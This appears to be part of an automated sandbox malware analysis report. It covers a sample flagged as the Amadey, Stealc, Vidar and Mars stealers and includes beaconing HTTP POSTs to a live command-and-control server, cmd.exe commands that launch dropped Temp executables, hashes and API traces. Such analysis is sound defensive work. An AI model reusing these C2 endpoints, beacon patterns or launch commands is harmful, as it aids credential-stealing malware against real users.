50	192.168.2.6	62972	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:57.407903910 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:58.114203930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:58.115057945 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:58.338197947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	62973	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:58.454562902 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:59.131092072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:59.131861925 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:59.378933907 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	62975	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:59.486027002 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:00.184576988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:10:00.185431004 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:10:00.416002989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	62976	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:00.535399914 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:01.213854074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:10:01.216717005 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:10:01.431201935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	62977	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:01.548953056 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:02.245810032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:10:02.246881008 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:10:02.465689898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	62978	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:02.585093975 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:03.291254997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:10:03.300942898 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:10:03.525115013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	62979	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:03.701267004 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:04.516618967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:10:04.520318985 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:10:04.741750956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	62980	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:04.875297070 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:05.565099955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	62982	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:10:05.694552898 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:10:06.380052090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	12:07:59
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x360000
File size:	2'545'664 bytes
MD5 hash:	05DDA1C444FE4FEDA4771F75598D55D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:08:46
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:08:47
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:08:47
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:08:47
Start date:	03/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:08:47
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe"
Imagebase:	0x3f0000
File size:	1'938'944 bytes
MD5 hash:	4E12569D3C3E421F624FD7560AC127A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2677594002.00000000003F1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2636976626.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:08:50
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Imagebase:	0x9b0000
File size:	1'938'944 bytes
MD5 hash:	4E12569D3C3E421F624FD7560AC127A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000003.2668322526.0000000005160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2708594114.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:08:51
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Imagebase:	0x9b0000
File size:	1'938'944 bytes
MD5 hash:	4E12569D3C3E421F624FD7560AC127A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000003.2678309307.0000000004890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.2718941030.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:09:00
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Imagebase:	0x9b0000
File size:	1'938'944 bytes
MD5 hash:	4E12569D3C3E421F624FD7560AC127A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2760972491.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.3412646742.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:09:07
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe"
Imagebase:	0xdb0000
File size:	2'545'664 bytes
MD5 hash:	05DDA1C444FE4FEDA4771F75598D55D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30%
Total number of Nodes:	110
Total number of Limit Nodes:	12

Executed Functions

Function 6C9B35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3F688,00001000), ref: 6C9B35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9B35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C9B35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C9B363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C9B369F
__aulldiv.LIBCMT ref: 6C9B36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C9B3773
EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9B377E
LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9B37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C9B37C4
EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9B37CB
LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9B3801
__aulldiv.LIBCMT ref: 6C9B3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C9B3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C9B3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C9B394C

Strings

AuthcAMDenti, xrefs: 6C9B3946
GenuntelineI, xrefs: 6C9B3639
GTC, xrefs: 6C9B3912
MOZ_TIMESTAMP_MODE, xrefs: 6C9B35DB
QPC, xrefs: 6C9B38FC

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 5f2f178339c994097fd0b09515ee15c95f0b392acdb0434e541dd6ee6e267ff2
Instruction ID: 87403082c938be67d6c1e618c3618aff72c4f112377296f8b953543000be037f
Opcode Fuzzy Hash: 5f2f178339c994097fd0b09515ee15c95f0b392acdb0434e541dd6ee6e267ff2
Instruction Fuzzy Hash: 4CB1A071B153529BDB1CCF28CC6465AB7F6BB8A704F04892DE89DD3390DB30D8068B85

Function 6C9CC930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6C9CC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C9CC969
GetSystemInfo.KERNEL32(?), ref: 6C9CC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C9CC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C9CC9E2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

